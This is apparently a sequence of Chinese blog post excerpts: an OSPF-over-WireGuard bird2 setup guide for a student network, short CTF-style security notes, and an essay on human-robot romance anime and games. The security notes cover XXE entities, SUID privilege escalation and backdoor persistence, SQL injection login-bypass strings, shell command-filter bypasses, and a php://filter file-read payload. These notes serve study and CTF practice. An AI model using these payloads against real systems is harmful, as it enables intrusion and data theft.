DN11 是受 DN42 启发而搭建的一个实验性网络，目前用于杭电范围内，对网络感兴趣的同学学习使用，DN11和DN42非常相似，他们之间的经验都有广泛借鉴意义。 背景 建 dn11 的时候遇到了一些小问题，在 fullmesh 的网络拓扑的情况下偶尔会出现几个节点连不上的情况，连不上了就直接连不上了，没有后话了。 实际上是可以通过绕路的方式联通的，这就要引入一些路由协议了，最早的构想是引入 BGP 协议的但是考虑了一下觉得这些东西的体量还是太大了，最后决定引入 ospf 协议，并且采取单一 area 的方式。 本文章将使用 bird2 配置 ospf over WireGuard，目的是给 dn11 成员提供一个 嘴对嘴的 ospf over WireGuard 配置教程。对于其他人可以忽略 dn11 规范部分来参考本教程进行配置。 OSPF 配置 先配置OSPF 这里我们选择 bird2 提供 ospf 支持，先配置 bird2 opkg install bird2 opkg install bird2c 在 openwrt 上，bird2 的配置文件默认地址在/etc/bird.conf bird2 的默认配置文件很长，算是一个 all config 先给他放到一边去 mv /etc/bird.conf /etc/bird.conf.bak 然后我们新建一个自己的 bird.conf vim /etc/bird.conf 给各位准备了配置文件模板，粘贴进去再改改就好了 log syslog all; debug protocols all; router id 172....

Preparation XXE:XML External Entity Injection, XML外部实体注入 <?xml version="1.0"? encoding="utf-8"?> <!DOCTYPE note SYSTEM "note.dtd"> <note> <to>George</to> <from>John</from> <heading>Reminder</heading> <body>Don't forget the meeting!</body> </note> encoding xml可以采取不同编码，定义在encoding中，对于绕过一些bypass有帮助 对于java应用可以使用utf-32be绕过!DOCTYPE过滤 其实这一行不写很多也认得出来是什么编码 DTD(Document Type Definition, 文档类型定义) 包含在<!DOCTYPE ... >中 一般实体与元素 元素 <!ELEMENT 元素名称 类别> <!ELEMENT 元素名称 (元素内容)> 元素用于声明xml元素，了解即可，可以引用实体 实体 <!ENTITY 实体名称 "实体的值"> <!ENTITY 实体名称 SYSTEM "URI/URL"> 实体可以被引用&实体名称; !! 实体不是什么抽象的概念，比如内建实体&lt;是<,做过前端开发应该都见过，只是现在这里允许自定义实体 参数实体 上文介绍的是一般实体，现在对比介绍参数实体 <!DOCTYPE note [ <!ENTITY % abc "233"> <!ENTITY bcs "344"> ]> <user>&bcs</user> 上面的定义中，出现了两种实体，分别是一般实体和参数实体，参数实体的定义和一般实体比一般实体的定义多了一个百分号% 参数实体一般作为声名实体的参数存在，仅仅在DTD区使用 参数实体的引用需要使用百分号%，例如%abc;...

童话

SUID特殊权限提权 SUID是什么 SUID是一种特殊权限，当拥有该权限的程序运行时，进程的属主不是进程的发起者而是程序的所有者。 SUID可以用来做什么 SUID是维持权限的一种手段，攻击者在临时获得权限后，可以将vim，cp等命令设置为SUID特殊权限，例如可以修改/root/.ssh/authorized_keys进行无密码登录，此外还有很多其他方式留后门。 添加SUID权限 example chmod u+s /usr/bin/vim chmod g+s /usr/bin/vim 寻找SUID权限文件 受害者错误配置的文件权限时，可以利用这些被错误配置的文件完成攻击 查找SUID、SGID文件 #Find SUID find / -type f -perm -u=s 2>/dev/null #Find GUID find / -type f -perm -g=s 2>/dev/null reference: http://cn-sec.com/archives/501443.html https://gtfobins.github.io

php输入输出流过滤器 references:https://www.php.net/manual/zh/wrappers.php.php

UNION 先想办法结束上个语句，再用UNION拼接下一个语句 堆叠注入 同上，但用;拼接 WHERE 使其SELECT所有数据 注入： admin’ – admin’ # admin’/* ’ or 1=1– ’ or 1=1# ’ or 1=1/* ‘) or ‘1’=‘1– ‘) or (‘1’=‘1– 以不同的用户登陆 ’ UNION SELECT 1, ‘anotheruser’, ‘doesnt matter’, 1– 报错注入

空格绕过 ${IFS} $IFS$9 $9指传过来的第9个参数 %09(需要PHP环境) <或者<>重定向 关键字绕过 变量拼接 a=c;b=at;c=fl;d=ag;$a$b $c$d 单引号，双引号绕过 ca''t flag 编码绕过 $(printf "\154\163") ==>ls $(printf "\x63\x61\x74\x20\x2f\x66\x6c\x61\x67") ==>cat /flag {printf,"\x63\x61\x74\x20\x2f\x66\x6c\x61\x67"}|\$0 ==>cat /flag 读文件绕过(当cat被过滤) more:一页一页的显示档案内容 less:与 more 类似，但是比 more 更好的是，他可以[pg dn][pg up]翻页 head:查看头几行(参数-c 10指定前10个字节) tac:从最后一行开始显示，可以看出 tac 是 cat 的反向显示 tail:查看尾几行(参数-c 10指定后10个字节) nl：显示的时候，顺便输出行号 od:以二进制的方式读取档案内容 vi/vim:一种编辑器，这个也可以查看 sort:可以查看 uniq:可以查看 file -f:报错出具体内容 反斜线 c\at $1、$2等和$@ c$1at from:https://blog.51cto.com/m0re/3879244

include include一个php流，base64编码源码 php://filter/read=convert.base64-encode/resource=index.php

信息的获取 SELECT version() 数据库版本 user() 数据库用户名 database 数据库名 @@datadir 数据库路径 @@version_compile_os 操作系统版本 其他 show columns from table_name;列信息 show databases;所有数据库名 show tables;所有表名 注入 1' order by 2 # 检查记录数量 字符串拼接 concat(str1,str2,…) 能够将你查询的字段连接在一起 concat_ws(separator,str1,str2,) 能够自定义分隔符来将你查询的字段链接在一起 group_concat([DISTINCT] column [Order BY ASC/DESC column] [Separator separator]) Example SELECT concat(table_name, ' ',column_name) FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = DATABASE(); SELECT group_concat(table_name, column_name separator '_') FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = DATABASE(); 关键字被过滤 简单的有: 大小写混用(seLect,whEre…) SEL<>ECT(php) 空格 -> () = -> like 但是极其容易被堵,其他方法有以下...

前言 十个人机九个刀，还有一个刀死人 人机恋题材具有著名的超高死亡率，虽然常常以悲剧或者是完全说不上是好结局的GoodEnd收尾，让人，特别是新人完全顶不住，但是其质量也往往高于一般的作品 因此就算往往会致郁，大多也值得去一玩 关于我见过的人机恋作品 按照我了解的时间顺序举例 游戏人生Zero Games Have Begun 是游戏人生的电影，大概是小说第四卷，讲的是一对很强但是从未赢过的夫妻的故事。 很值得看看https://www.bilibili.com/bangumi/play/ss28381 女主人公休比机凯种，为了破解人类所谓的“心”来观察人类，过程中渐渐具有人类情感并与人类男子里克相恋 满溢而出的ERROR 最终因独自出门布置装置被击杀，但“心”在最后备份到了云端，里克在机凯种的帮助下结束了战争，但死于握持星杯时的反噬 这部作品和其他人机恋讲的故事不太一样，他没有专注于渲染离别的悲伤，也没讲人机恋会出现的问题，更多的是通过宏大的叙事表达一种浪漫 一种二人拯救世界的浪漫 可塑性记忆 愿你有一天能和你重要的人再度相逢 这款游戏其实我没玩过，因为他在PSV上，有点年头了也很难玩到，但是其动画化后的动画还是很容易看到的。 这是我第一次被刀到哭的作品，没看过的可以https://www.bilibili.com/bangumi/play/ep28924 我是在被剧透后观看的，不过即使我有了一定抵抗力，告别的场景也很难让人不流泪 非常经典的人机恋题材作品，从相遇到日常再到相恋到最后几经波折后的离别 艾拉从事的就是giftia（本作中的机器被称为giftia）回收工作，所以她最后也由男主角来回收 越是刻画日常生活中艾拉的可爱与两人的糖最后就越是让人难受 星之梦 若是天国有两扇门，我可不跟你走啊 星之梦严格意义上可能不能算人机恋 故事发生在人类都市废墟，星野梦美是现已废弃的天文馆中的讲解机器人，男主来废墟捡垃圾在天文馆中找到了她 男主被梦美所打动，本来是要带她离开废墟，继续传播仰望星空的那种希望 最后为男主挡伤害与没电两个原因停止工作，本作最后反复多方向渲染离别，即使我现在剧透给你听，你再去看也很催泪 推荐观看https://www.bilibili.com/bangumi/play/ep90842 另外，其实星野梦美的记忆芯片（128EB）有保留，但男主在死前，在找到其他机器人后并没有进行替换 露西 她所期望的一切 还有我所期望的一切 这部作品我到最后都没明白Lucy想要什么，推测应该是某种记忆的永恒。 但是这个男主父亲是真的过分，明明看着Lucy会哭会笑，还下得去手。 这便是人性的阴暗面吧，能体会到这种阴暗，很难讲出来到底是为什么 不过本作结局还是给了一个比较好的结局，经过男主的努力15年后Lucy回来了 ATRI-My Dear Moments- 我是高性能的嘛！ 2020年的新游戏，说是年轻人的第一款galgame。我本来是冲着atri来的，做足了心理准备，但还是刀的我有点始料未及。 没玩过的就别看下面了，快去steam上买吧，不亏的 话说宣传PV都是动画，这部作品动画化怕是指日可待啊！ 本作总体是从认识到相恋到告别的老故事，与上述作品不同的是其讨论了仿生人是否具有心 关于机器人时候有心的讨论让这部作品显得更为深刻，atri是明确有心的，但是没有被任何人包括自己发现 因为atri确实是机器人，atri只是做着她认为机器人该做的事情从而埋藏了自己的心 被命令不能模拟人类情感后的，无感情的那一刻让人看了简直心碎了 所以我认为作品中所谓的拯救atri就是让她发现自己的心，并遵循内心的想法来生活 atri和男主是互相拯救的关系的，atri走后男主回研究院去拯救世界了 共同点 见识过那么多优秀的人机恋类型的作品，其实他们都遵循这几个点 特有的发言风格 机器人特有的发言风格，在说话中会从自己的特殊身份出发，这与人类的日常说话方式截然不同 艾拉在假装没听见时会回复“ERROR 听不见” atri会反复强调“我可是高性能的啊” 休比前期会有发言前缀 称呼男主为主人或者客人 特有的蠢萌性格 在人们的一般印象中，机器人是不会出什么差错的，机器人做出了什么奇怪的事情是很难想象的。 而大多数作品的机器人都会出错，这可以解释为程序的问题，亦或是与人类之间的理解偏差 休比前期有很多有关调教的迷惑发言，如身体只能给里克看之类的 atri会把主人丢到海里去，前期不会做家务不会做饭 艾拉会自己撞到墙 星野梦美送男主零件花束 极强的岗位意识...